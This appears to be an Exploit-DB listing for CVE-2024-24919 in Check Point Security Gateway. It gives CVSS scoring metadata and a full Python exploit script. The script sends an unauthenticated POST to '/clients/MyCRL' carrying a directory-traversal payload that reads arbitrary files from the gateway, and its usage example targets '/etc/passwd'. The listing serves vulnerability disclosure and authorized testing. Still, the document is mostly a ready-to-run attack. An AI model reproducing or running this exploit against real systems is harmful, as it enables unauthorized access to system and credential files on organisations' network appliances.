Check Point Security Gateway - Information Disclosure (Unauthenticated)

2024-05-3100:00:00

Yesith Alvarez

www.exploit-db.com

check point security gateway

information disclosure

unauthenticated

yesith alvarez

versions

cve-2024-24919

exploit

CVSS3

8.6

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

AI Score

8.9

Confidence

High

EPSS

0.945

Percentile

99.3%

JSON

# Exploit Title:  Check Point Security Gateway - Information Disclosure (Unauthenticated)
# Exploit Author: Yesith Alvarez
# Vendor Homepage: https://support.checkpoint.com/results/sk/sk182336
# Version: R77.20 (EOL), R77.30 (EOL), R80.10 (EOL), R80.20 (EOL), R80.20.x, R80.20SP (EOL), R80.30 (EOL), R80.30SP (EOL), R80.40 (EOL), R81, R81.10, R81.10.x, R81.20 
# CVE : CVE-2024-24919

from requests import Request, Session
import sys
import json



def title():
    print('''
    
   _______      ________    ___   ___ ___  _  _        ___  _  _   ___  __  ___  
  / ____\ \    / /  ____|  |__ \ / _ \__ \| || |      |__ \| || | / _ \/_ |/ _ \ 
 | |     \ \  / /| |__ ______ ) | | | | ) | || |_ ______ ) | || || (_) || | (_) |
 | |      \ \/ / |  __|______/ /| | | |/ /|__   _|______/ /|__   _\__, || |\__, |
 | |____   \  /  | |____    / /_| |_| / /_   | |       / /_   | |   / / | |  / / 
  \_____|   \/   |______|  |____|\___/____|  |_|      |____|  |_|  /_/  |_| /_/  
                                                                                 
                                                                          
                                                                                                                      
                                                                              
Author: Yesith Alvarez
Github: https://github.com/yealvarez
Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/
    ''')   

def exploit(url, path):
	url = url + '/clients/MyCRL'
	data = 	"aCSHELL/../../../../../../../../../../.."+ path
	headers = {				
		'Connection': 'keep-alive',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0'
	}
	s = Session()
	req = Request('POST', url, data=data, headers=headers)
	prepped = req.prepare()
	#del prepped.headers['Content-Type']
	resp = s.send(prepped,
	    verify=False,
	    timeout=15
	)  
	print(prepped.headers)
	print(url)
	print(resp.headers)
	print(resp.status_code)


if __name__ == '__main__':
    title()
    if(len(sys.argv) < 3):
    	print('[+] USAGE: python3 %s https://<target_url> path\n'%(sys.argv[0]))
    	print('[+] EXAMPLE: python3 %s https://192.168.0.10 "/etc/passwd"\n'%(sys.argv[0]))    	
    	exit(0)
    else:
    	exploit(sys.argv[1],sys.argv[2])